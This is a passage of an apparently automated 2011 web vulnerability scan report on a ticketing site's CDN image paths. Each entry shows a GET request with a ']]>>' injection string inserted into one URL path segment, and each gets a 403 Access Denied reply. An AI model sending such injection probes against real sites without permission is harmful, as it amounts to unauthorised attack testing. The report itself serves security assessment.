X-Amz-Cf-Id: fda3576be53ae9d30cf89cbcc5d11a4331d58553745b69239a318c89a53ca1138ae60b7daa28b283
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2BB157C8B78CD589</RequestId><HostId>iAvVDpnyDCZ4MzEUfrRSYs3FqbeBDd4sGCzDNQKhhnIcJyFXkd
...[SNIP]...

8.27. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-large-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3F54AB3F98BAA6D3
x-amz-id-2: N42HHSpQcCLscS76R6oNgirDkfhNI1EWmSqPLTxhzmh8/3tcArvTJAUvrZnqzFqG
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:35 GMT
Server: AmazonS3
Age: 2
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0f4a214deba06875b21c9b1eb50659547d9a4650f914541f58cb6f528e21555e90ca1a18b634a9e3
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3F54AB3F98BAA6D3</RequestId><HostId>N42HHSpQcCLscS76R6oNgirDkfhNI1EWmSqPLTxhzmh8/3tcAr
...[SNIP]...

8.28. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 609E17216EA78A80
x-amz-id-2: 8XVmOQNXz/KuZ+IWGRlcSxtwQwWrNLfUcL17Xaq2oLgzZIMjBmEMcNNLNZs8Mr2y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:39 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 03699156bbbea76390c505fab44ba8da9f6cf19491742ef8ff6d561464d5f2eb2d036a66990c9354
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>609E17216EA78A80</RequestId><HostId>8XVmOQNXz/KuZ+IWGRlcSxtwQwWrNLfUcL17Xaq2oLgzZIMjBm
...[SNIP]...

8.29. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BDB9887B90F8B036
x-amz-id-2: Y9abPM1E8NWhmF4KUFckk0oM5RhqdPjjZmm2EacqARyfUQNqhpKps6ZO+7+r2et9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0de9c428da503f1d21036468d985ac2bfbd04e64982dcb370718627ac2e353e0b08d185788b88a3b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BDB9887B90F8B036</RequestId><HostId>Y9abPM1E8NWhmF4KUFckk0oM5RhqdPjjZmm2EacqARyfUQNqhp
...[SNIP]...

8.30. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FC132F72E152C494
x-amz-id-2: J8kg5IfkmohWGqdH+LIEcRSoPN0QIxvQnAKoqB2krFYhGjSaDYuS+dlONNpqj2eV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:18 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 766b9fb8eeb43a69b7b79ff71c76b0dd032a2d003283250f6b1cccfe07f97e5b31dbc8487636e66b
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FC132F72E152C494</RequestId><HostId>J8kg5IfkmohWGqdH+LIEcRSoPN0QIxvQnAKoqB2krFYhGjSaDY
...[SNIP]...

8.31. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 57C54B6F1891E5F8
x-amz-id-2: bA7tk7brK0U8t2aMlOiau9bSUXAsapKuyUORh6Bo3Jg+DjM6BLdTZ99wMzWxOn5N
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 95a187b201840e4162aa6ccea252663c5b46de34fc5a912a4ac2f2ff6f72013c103b81abd840b59a
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>57C54B6F1891E5F8</RequestId><HostId>bA7tk7brK0U8t2aMlOiau9bSUXAsapKuyUORh6Bo3Jg+DjM6BL
...[SNIP]...

8.32. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E1A15257D6B5C5C3
x-amz-id-2: 4+S2nDfpzXnOuPf4KRH6Vz0aZA6ScW+zm/Ivwtjowk1TKTGfqozLINH1IwvIX5Vb
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 477a7bd9d5245cd4bba55c996d3a67374f3f7be63970a75b48218baa4f38c746dad7dae1ba92bc41
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E1A15257D6B5C5C3</RequestId><HostId>4+S2nDfpzXnOuPf4KRH6Vz0aZA6ScW+zm/Ivwtjowk1TKTGfqo
...[SNIP]...

8.33. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-143.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 92F588FE6A1606B1
x-amz-id-2: cNdvVk0crAofLITFTzkmMCpZE3I0LI3z7wdQJ5d4Hf3ThUBPcMPQHoAGs4B2LnXH
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:56 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 980f4787067d46576e5f7b387b4ac1a2feebe92bd804b0da785369e4ab68f61459a2fe34503db929
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>92F588FE6A1606B1</RequestId><HostId>cNdvVk0crAofLITFTzkmMCpZE3I0LI3z7wdQJ5d4Hf3ThUBPcM
...[SNIP]...

8.34. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-143.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 15C362866C433185
x-amz-id-2: Mx0XS7Iqtq1J+ZFzCnI3RQgmfgW67M2/Z1qxgl4egRLAJWoNpQMIOg1nnXUQOayA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3005e9dac3b65a03183d9d675daa791cdf8cb70bdd2d87dad5a5c1ffce89d92d209bec2ad6e1e688
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>15C362866C433185</RequestId><HostId>Mx0XS7Iqtq1J+ZFzCnI3RQgmfgW67M2/Z1qxgl4egRLAJWoNpQ
...[SNIP]...

8.35. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-143.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7747F6A28805E7DD
x-amz-id-2: ALSV2ogncUvm5lCSg9I7LuQrTOO//KjqS1tmOlx5hqvKfe9/cRv2sJTcxAZiK/if
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5c7f2866a9939c2a96316f4261ee643302b8db316d250b3c96703f43e026e55521c8fe6a9a7b2c94
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7747F6A28805E7DD</RequestId><HostId>ALSV2ogncUvm5lCSg9I7LuQrTOO//KjqS1tmOlx5hqvKfe9/cR
...[SNIP]...

8.36. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D430531E0007B09B
x-amz-id-2: DBs4eSsN365WR5oG/4fvYdJEUk/Oraa06ZLXrOkhw3iTTKh6xnCB5Rubqjl2ZL9r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0d7490eede061b51f9f08533f95284c85092e55ba8cdf2005e81985bcb6133aa0d8f8eb7956dc788
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D430531E0007B09B</RequestId><HostId>DBs4eSsN365WR5oG/4fvYdJEUk/Oraa06ZLXrOkhw3iTTKh6xn
...[SNIP]...

8.37. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C4351B348112B89F
x-amz-id-2: mPP/cyYtRJ8fgosz50IObYzVsczG5s/kxiUshww7/GWfo8dUSzT80zaqZL+e0dOV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 338b71d652b65d9e99dc257f1414a9d6b32cd9283bb1509d179b7378494d9bfef6caa644418a60b9
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C4351B348112B89F</RequestId><HostId>mPP/cyYtRJ8fgosz50IObYzVsczG5s/kxiUshww7/GWfo8dUSz
...[SNIP]...

8.38. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FE038267AF77498A
x-amz-id-2: Aehae73CCvFl5ZzcfGgXmMmaxtp1+JvgoH6E6bjjpMl+03EI+Sx/boFEHhMt7EF+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8d076905a7c725f5a4f7b2acaeff57eb16f4795fcb4b994f6b5a8567dfbc3ac4e553418a9278a12d
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FE038267AF77498A</RequestId><HostId>Aehae73CCvFl5ZzcfGgXmMmaxtp1+JvgoH6E6bjjpMl+03EI+S
...[SNIP]...

8.39. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 32B7864015EEA984
x-amz-id-2: CvAJ/S9CxHtfQNUj7lMhn1MuMpgP03ep/xf0RxAU69BVUt3voPdJm3IShSHln1vZ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 16be052502fa4cd646dc06576f1d2c58c4dcb1fe1aac67d898dab991b6acb85744e74ca3e10b39b6
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>32B7864015EEA984</RequestId><HostId>CvAJ/S9CxHtfQNUj7lMhn1MuMpgP03ep/xf0RxAU69BVUt3voP
...[SNIP]...

8.40. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B029DA5A906F0E85
x-amz-id-2: fNr9HdqJRFHVusSGLbGrHvEZYzn90QXn7P8h96BXiSD3CoS2Nmi8PfGkHwx3nAnQ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: feeb66e859bbfdb13b71c12ed3d3a1a96fc7931aae864b06bcccfcd1c9dfd339bfbc46a4c57c0be9
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B029DA5A906F0E85</RequestId><HostId>fNr9HdqJRFHVusSGLbGrHvEZYzn90QXn7P8h96BXiSD3CoS2Nm
...[SNIP]...

8.41. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

